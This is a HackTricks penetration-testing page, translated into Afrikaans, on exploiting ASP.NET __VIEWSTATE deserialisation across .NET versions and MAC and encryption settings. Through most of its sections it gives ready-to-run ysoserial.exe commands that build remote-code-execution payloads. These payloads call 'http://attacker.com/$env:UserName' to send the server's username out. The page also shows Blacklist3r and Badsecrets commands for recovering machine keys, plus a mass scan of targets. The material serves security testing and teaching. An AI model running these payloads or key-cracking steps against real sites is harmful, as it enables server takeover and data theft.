hacktricks/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

# Uitbuiting van \_\_VIEWSTATE sonder om die geheime te ken

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>

<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">

As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_).

{% embed url="https://www.stmcyber.com/careers" %}

## Wat is ViewState

**ViewState** dien as die verstek meganisme in ASP.NET om bladsy- en beheerdata oor webbladsye te behou. Tydens die weergawe van 'n bladsy se HTML word die huidige toestand van die bladsy en waardes wat behou moet word tydens 'n terugstuur, geserializeer in base64-gekodeerde strings. Hierdie strings word dan in verborge ViewState-velde geplaas.

ViewState-inligting kan gekenmerk word deur die volgende eienskappe of hul kombinasies:

- **Base64**:
- Hierdie formaat word gebruik wanneer sowel die `EnableViewStateMac` as die `ViewStateEncryptionMode` eienskappe op vals gestel word.

- **Base64 + MAC (Message Authentication Code) Geaktiveer**:
- Aktivering van MAC word bereik deur die `EnableViewStateMac` eienskap op waar te stel. Dit bied integriteitsverifikasie vir ViewState-data.

- **Base64 + Versleutel**:
- Versleuteling word toegepas wanneer die `ViewStateEncryptionMode` eienskap op waar gestel word, wat die vertroulikheid van ViewState-data verseker.

## Toetsgevalle

Die prentjie is 'n tabel wat verskillende konfigurasies vir ViewState in ASP.NET beskryf op grond van die .NET-raamwerkweergawe. Hier is 'n opsomming van die inhoud:

1. Vir **enige weergawe van .NET**, wanneer beide MAC en Versleuteling gedeaktiveer is, is 'n MachineKey nie nodig nie, en daar is dus geen toepaslike metode om dit te identifiseer nie.

2. Vir **weergawes onder 4.5**, as MAC geaktiveer is maar Versleuteling nie, is 'n MachineKey nodig. Die metode om die MachineKey te identifiseer, word verwys na as "Blacklist3r."

3. Vir **weergawes onder 4.5**, ongeag of MAC geaktiveer of gedeaktiveer is, as Versleuteling geaktiveer is, is 'n MachineKey nodig. Die identifisering van die MachineKey is 'n taak vir "Blacklist3r - Toekomstige Ontwikkeling."

4. Vir **weergawes 4.5 en hoër**, vereis alle kombinasies van MAC en Versleuteling (of beide is waar, of een is waar en die ander is vals) 'n MachineKey. Die MachineKey kan geïdentifiseer word met behulp van "Blacklist3r."


### Toetsgeval: 1 – EnableViewStateMac=false en viewStateEncryptionMode=false

Dit is ook moontlik om die ViewStateMAC heeltemal te deaktiveer deur die `AspNetEnforceViewStateMac`-register sleutel op nul te stel in:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
```
**Identifiseer ViewState Eienskappe**

Jy kan probeer om te identifiseer of ViewState deur 'n aanvraag wat hierdie parameter bevat, vas te vang met BurpSuite, MAC beskerm word. As Mac nie gebruik word om die parameter te beskerm nie, kan jy dit uitbuit deur [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) te gebruik.
```
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
```
### Toetsgeval 1.5 - Soos toetsgeval 1, maar die ViewState-koekie word nie deur die bediener gestuur nie

Ontwikkelaars kan **ViewState verwyder** sodat dit nie deel word van 'n HTTP-versoek nie (die gebruiker sal hierdie koekie nie ontvang nie).\
Mens kan aanneem dat as **ViewState nie teenwoordig is nie**, hul implementering **veilig** is teen enige potensiële kwesbaarhede wat met ViewState-deserialisering gepaard gaan.\
Dit is egter nie die geval nie. As ons die **ViewState-parameter** by die versoekliggaam voeg en ons geserialiseerde payload wat met ysoserial geskep is, stuur, sal ons steeds **kodering kan uitvoer** soos in **Geval 1** getoon.

### Toetsgeval 2 - .Net < 4.5 en EnableViewStateMac=true & ViewStateEncryptionMode=false

Om **ViewState MAC** vir 'n **spesifieke bladsy** te aktiveer, moet ons die volgende veranderinge aanbring in 'n spesifieke aspx-lêer:
```bash
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
```
Ons kan dit ook doen vir die **algehele** toepassing deur dit in die **web.config** lêer in te stel soos hieronder getoon:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>
```
Aangesien die parameter hierdie keer MAC-beskerming het, moet ons die sleutel wat gebruik word, verkry om die aanval suksesvol uit te voer.

Jy kan probeer om [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) gebruik om die gebruikte sleutel te vind.
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value
```
[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) is nog 'n instrument wat bekende machineKeys kan identifiseer. Dit is in Python geskryf, soos Blacklist3r, daar is geen afhanklikheid van Windows nie. Vir .NET viewstates is daar 'n "python blacklist3r" hulpprogram, wat die vinnigste manier is om dit te gebruik.

Dit kan óf voorsien word met die viewstate en generator direk:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
```
![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)

Of, dit kan direk na die teiken-URL verbind en probeer om die viewstate uit die HTML te sny:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
```
![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)

Om na kwesbare viewstates op skaal te soek, in samewerking met subdomeinopsporing, kan die `badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) module gebruik word:
```
bbot -f subdomain-enum -m badsecrets -t evil.corp
```
![https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)

As jy gelukkig is en die sleutel gevind word, kan jy voortgaan met die aanval deur gebruik te maak van [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}
```
In gevalle waar die `_VIEWSTATEGENERATOR` parameter **nie** deur die bediener gestuur word nie, hoef jy nie die `--generator` parameter te **verskaf nie, maar hierdie**:
```bash
--apppath="/" --path="/hello.aspx"
```
### Toetsgeval: 3 - .Net < 4.5 en EnableViewStateMac=true/false en ViewStateEncryptionMode=true

In hierdie geval is dit nie bekend of die parameter beskerm word met 'n MAC nie. Dan is die waarde waarskynlik versleutel en sal jy **die Machine Key nodig hê om jou payload te versleutel** om die kwesbaarheid uit te buit.

**In hierdie geval is die** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **module in ontwikkeling...**

Voor .NET 4.5 kan ASP.NET 'n **ongeënkripteerde** \_`__VIEWSTATE`\_parameter van die gebruikers **aanvaar**, selfs as **`ViewStateEncryptionMode`** op _**Always**_ ingestel is. ASP.NET **kontroleer slegs** die **teenwoordigheid** van die **`__VIEWSTATEENCRYPTED`** parameter in die versoek. **As hierdie parameter verwyder word en die ongeënkripteerde payload gestuur word, sal dit steeds verwerk word.**

Daarom, as die aanvallers 'n manier vind om die Machinekey te bekom deur 'n ander kwesbaarheid soos lêertraversal, kan [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) bevel wat in **Geval 2** gebruik is, gebruik word om RCE uit te voer deur gebruik te maak van die ViewState deserialisering kwesbaarheid.

* Verwyder die `__VIEWSTATEENCRYPTED` parameter uit die versoek om die ViewState deserialisering kwesbaarheid uit te buit, anders sal dit 'n Viewstate MAC-valideringsfout teruggee en sal die uitbuiting misluk.

### Toetsgeval: 4 - .Net >= 4.5 en EnableViewStateMac=true/false en ViewStateEncryptionMode=true/false behalwe beide eienskappe op false

Ons kan die gebruik van die ASP.NET-raamwerk afdwing deur die onderstaande parameter in die web.config-lêer te spesifiseer soos hieronder getoon.
```xml
<httpRuntime targetFramework="4.5" />
```
Alternatiewelik kan dit gedoen word deur die onderstaande opsie te spesifiseer binne die `machineKey` parameter van die web.config-lêer.
```bash
compatibilityMode="Framework45"
```
Soos in die vorige geval is die **waarde versleutel**. Om 'n **geldige payload te stuur, het die aanvaller die sleutel nodig**.

Jy kan probeer om [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) te gebruik om die gebruikte sleutel te vind:
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}
```
Vir 'n meer gedetailleerde beskrywing van IISDirPath en TargetPagePath [verwys hierheen](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)

Of, met [**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) (met 'n generatorwaarde):
```bash
cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415
```
![https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)

Sodra 'n geldige Masjien sleutel geïdentifiseer is, **is die volgende stap om 'n geserializeerde payload te genereer deur gebruik te maak van** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
```
ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
```
As jy die waarde van `__VIEWSTATEGENERATOR` het, kan jy probeer om die `--generator` parameter met daardie waarde te **gebruik** en die parameters `--path` en `--apppath` **weg te laat**.

![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/4.2.png)

'n Suksesvolle uitbuiting van die ViewState deserialisering kwesbaarheid sal lei tot 'n out-of-band versoek na 'n aanvaller-beheerde bediener, wat die gebruikersnaam insluit. Hierdie soort uitbuiting word gedemonstreer in 'n bewys van konsep (PoC) wat gevind kan word deur 'n hulpbron getiteld "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". Vir verdere besonderhede oor hoe die uitbuitingsproses werk en hoe om gereedskap soos Blacklist3r te gebruik om die MachineKey te identifiseer, kan jy die verskafte [PoC van Suksesvolle Uitbuiting](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC) hersien.

### Toetsgeval 6 - ViewStateUserKeys word gebruik

Die **ViewStateUserKey** eienskap kan gebruik word om teen 'n **CSRF-aanval** te **verdedig**. As so 'n sleutel in die toepassing gedefinieer is en ons probeer om die **ViewState** payload te genereer met die besproke metodes tot dusver, sal die **payload nie deur die toepassing verwerk word** nie.\
Jy moet nog 'n parameter gebruik om die payload korrek te skep:
```bash
--viewstateuserkey="randomstringdefinedintheserver"
```
### Resultaat van 'n Suksesvolle Uitbuiting <a href="#poc" id="poc"></a>

Vir al die toetsgevalle, as die ViewState YSoSerial.Net-payload **suksesvol** werk, reageer die bediener met "500 Internal server error" met die inhoud van die respons "Die staat-inligting is ongeldig vir hierdie bladsy en mag beskadig wees" en ons kry die OOB-versoek.

Kyk vir [verdere inligting hier]([**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/))

## Verwysings

* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
* [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)\\
* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)

<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">

As jy belangstel in 'n **hackerloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>